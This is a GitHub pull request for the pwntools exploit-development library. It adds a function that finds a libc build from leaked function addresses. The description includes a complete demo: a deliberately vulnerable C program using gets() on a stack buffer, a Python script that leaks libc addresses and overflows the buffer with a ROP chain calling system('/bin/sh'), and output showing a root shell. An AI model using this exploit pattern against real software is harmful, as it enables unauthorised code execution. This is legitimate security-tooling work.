Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add search for libc binary by leaked function addresses #2103

Merged
merged 6 commits into from Mar 22, 2023
Merged

Add search for libc binary by leaked function addresses #2103

merged 6 commits into from Mar 22, 2023

Conversation

peace-maker
Copy link
Member

When you're able to leak addresses of the libc library, use libcdb.search_by_symbol_offsets() to find and download the matching libc library from https://libc.rip/.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

from pwn import *

exe = context.binary = ELF('./vuln')

io = process('./vuln')
puts_leak = int(io.recvline(), 0)
printf_leak = int(io.recvline(), 0)

libc = ELF(libcdb.search_by_symbol_offsets({'puts': puts_leak, 'printf': printf_leak}))
libc.address = puts_leak - libc.sym.puts

rop = ROP(libc)
rop.call(rop.ret)
rop.system(next(libc.search(b'/bin/sh\x00')))

io.sendline(flat({0x28: rop.chain()}))
io.interactive()
// gcc -fno-stack-protector -o vuln vuln.c
#include <stdio.h>

int main(int argc, char* argv[]) {
    char buf[0x20];
    printf("%p\n%p\n", puts, printf);
    gets(buf);
    return 0;
}
$ python expl.py
[*] 'vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './vuln': pid 1894
[*] Multiple matching libc libraries for requested symbols:
[*] 1. libc6_2.31-0ubuntu9.8_amd64
        BuildID:     c9d56de82ddd00d822d6100034f3075ef1709cd2
        MD5:         993088888bcc0bf78d74e1e8ca0d33a6
        SHA1:        957a705e586fcefc6a3330b78a66d070a00d72ec
        SHA256:      e29f30c7204d46c55fb1ac1323707cae0884a189b82a24a144861c1e6220da6d
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
[*] 2. libc6_2.31-0ubuntu9.9_amd64
        BuildID:     1878e6b475720c7c51969e69ab2d276fae6d1dee
        MD5:         5898fac5d2680d0d8fefdadd632b7188
        SHA1:        1430c57bf7ca6bd7f84a11c2cb7580fc39da07f5
        SHA256:      80378c2017456829f32645e6a8f33b4c40c8efa87db7e8c931a229afa7bf6712
        Symbols:
            __libc_start_main_ret = 0x24083
                             dup2 = 0x10e8c0
                           printf = 0x61c90
                             puts = 0x84420
                             read = 0x10dfc0
                       str_bin_sh = 0x1b45bd
                           system = 0x52290
                            write = 0x10e060
 [?] Select the libc version to use:
       1) libc6_2.31-0ubuntu9.8_amd64
    2> 2) libc6_2.31-0ubuntu9.9_amd64
[-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee': Got code 404
[!] Could not fetch libc for build_id 1878e6b475720c7c51969e69ab2d276fae6d1dee from libcdb
[+] Downloading 'https://libc.rip/download/libc6_2.31-0ubuntu9.9_amd64.so': 1.94MB
[+] Downloading 'https://debuginfod.systemtap.org/buildid/1878e6b475720c7c51969e69ab2d276fae6d1dee/debuginfo': 5.19MB
[+] Starting local process '/usr/bin/eu-unstrip': pid 1899
[+] Receiving all data: Done (0B)
[*] Process '/usr/bin/eu-unstrip' stopped with exit code 0 (pid 1899)
[*] '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Loaded 196 cached gadgets for '/root/.cache/.pwntools-cache-3.8/libcdb/build_id/1878e6b475720c7c51969e69ab2d276fae6d1dee'
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
$
[*] Stopped process './vuln' (pid 1894)

Fixes #1867

@peace-maker
libcdb: Add option to search by function offsets
c729a8e 
When you're able to leak addresses of the libc library, use `libcdb.search_by_symbol_offsets()` to find and download the matching libc library from https://libc.rip.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

Fixes Gallopsled#1867
@peace-maker
libcdb: Handle multiple results when looking up by hash
9919ace 
Sometimes the same library appears to be indexed multiple times (see 0b52d2e713d243f0f65d808fcd3fbe372bb3cd32). Handle that situation by selecting the first in the list, since they should all be identical given the same hash value.
@peace-maker peace-maker changed the title Add search of libc binary by leaked function addresses Add search for libc binary by leaked function addresses Aug 29, 2022
@gsingh93
Copy link
Contributor

It would be great to support a local version of this based off of the scripts in https://github.com/niklasb/libc-database instead of the website. I'd want to have access to this feature without any internet connectivity.

@peace-maker
Copy link
Member Author

Indeed, but that would fit better into a separate contribution, since it'd touch the other libcdb.search_by_* functions as well. Do you want to add it?

Arusekk
Arusekk requested changes Dec 28, 2022
View reviewed changes
pwnlib/libcdb.py Outdated Show resolved Hide resolved
pwnlib/libcdb.py Outdated Show resolved Hide resolved
@Arusekk Arusekk merged commit aa48227 into Gallopsled:dev Mar 22, 2023
@peace-maker peace-maker deleted the libc_offset_lookup branch March 22, 2023 13:57
@the-soloist the-soloist mentioned this pull request Aug 30, 2023
Closed
gogo2464 pushed a commit to gogo2464/pwntools that referenced this pull request Sep 10, 2023
@peace-maker @Arusekk
Add search for libc binary by leaked function addresses (Gallopsled#2103
de102a3 
)

* libcdb: Add option to search by function offsets

When you're able to leak addresses of the libc library, use `libcdb.search_by_symbol_offsets()` to find and download the matching libc library from https://libc.rip.

If there are multiple matches, the user is prompted to select one interactively. The selection can be saved in the code for future executions of the script.

Fixes Gallopsled#1867

* libcdb: Handle multiple results when looking up by hash

Sometimes the same library appears to be indexed multiple times (see 0b52d2e713d243f0f65d808fcd3fbe372bb3cd32). Handle that situation by selecting the first in the list, since they should all be identical given the same hash value.

* Update CHANGELOG

* Fix off-by-one when pre-selecting a libc

* Do .json() only once

---------

Co-authored-by: Arusekk <arek_koz@o2.pl>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Arusekk Arusekk Arusekk requested changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Support for libc databases with offsets using https://libc.rip/api/
3 participants
@peace-maker @gsingh93 @Arusekk